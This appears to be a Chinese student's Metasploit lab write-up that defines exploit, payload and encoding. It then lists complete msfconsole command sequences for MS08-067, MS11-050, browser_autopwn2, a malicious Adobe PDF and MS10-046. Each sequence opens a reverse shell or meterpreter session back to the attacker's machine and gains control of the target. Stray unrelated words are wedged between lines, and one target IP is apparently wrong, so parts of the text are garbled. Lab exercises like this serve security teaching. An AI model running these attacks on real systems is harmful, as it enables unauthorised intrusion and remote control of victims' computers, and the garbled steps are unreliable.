(1)用本身的话解释什么是 exploit , payload , encode.html
exploit: 设至关于利用漏洞偷偷打开的管道,将作好的木马病毒等顺利传输到靶机。
payload: 简单来讲就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,而后经过管道传输进去后开始为咱们控制靶机服务。
encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,可是不改变payload为咱们所用的特征,但能对payload进行加工。
shell
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:windows
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
//tcp反向回连msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161
//攻击机ipmsf exploit(ms08_067_netapi) > set LPORT 5213
//攻击端口msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161
//靶机ip,特定漏洞端口已经固定msf exploit(ms08_067_netapi) > set target 0
//自动选择目标系统类型,匹配度较高msf exploit(ms08_067_netapi) > exploit
//攻击此时须要关闭靶机的防火墙,否则会出现ConnectionTimeOut
的失败;
api
攻击成功后的结果:
浏览器
2.浏览器渗透攻击——MS11-050安全
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http
//http反向回连msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161
//攻击机ipmsf exploit(ms11_050_cobjectelement) > set LPORT 5213
//攻击端口固定msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm
//统一资源标识符路径设置msf exploit(ms11_050_cobjectelement) > exploit
如今攻击机里进入msfconsole,而后分别输入
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.43.161
set URIPATH auto
show options
服务器
尝试成功,输出了可被访问的URL http://192.168.43.161:8080/auto
并启动服务器;
session
在靶机浏览器上输入URL后,浏览器跳转到 http://192.168.43.161:8080/auto/FaOGsp
上
tcp
回头看一下kali机,发现回连成功了,输入session -i 2
获取对话,此时,已经得到了靶机的控制权。
测试
3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp
//tcp反向回连msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161
//攻击机ipmsf exploit(adobe_cooltype_sing) > set LPORT 5213
//攻击端口msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf
//设置生成pdf文件的名字msf exploit(adobe_cooltype_sing) > exploit
//攻击将生成的pdf文件拷贝到靶机上。
在kali上输入back退出当前模块,进入监听模块,输入如下命令:
msf > use exploit/multi/handler
//进入监听模块msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向链接msf exploit(handler) > set LHOST 192.168.43.161
//攻击机ipmsf exploit(handler) > set LPORT 5213
//攻击端口固定msf exploit(handler) > exploit
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48
//攻击机ipmsf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
//tcp反向回连msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48
//攻击机ipmsf exploit(ms10_046_shortcut_icon_dllloader) > exploit
//攻击sessions
查看,并选择sessions -i 1
,得到靶机控制权。本次试验给我最深的感触就是msf的强大,活用msf真的可以在渗透测试或者以攻击为目的的行为给予很大帮助,同时,为了防止被攻击,仍是及时更新系统,填补漏洞,由于有一双研眼镜正在窥探你的笔记本。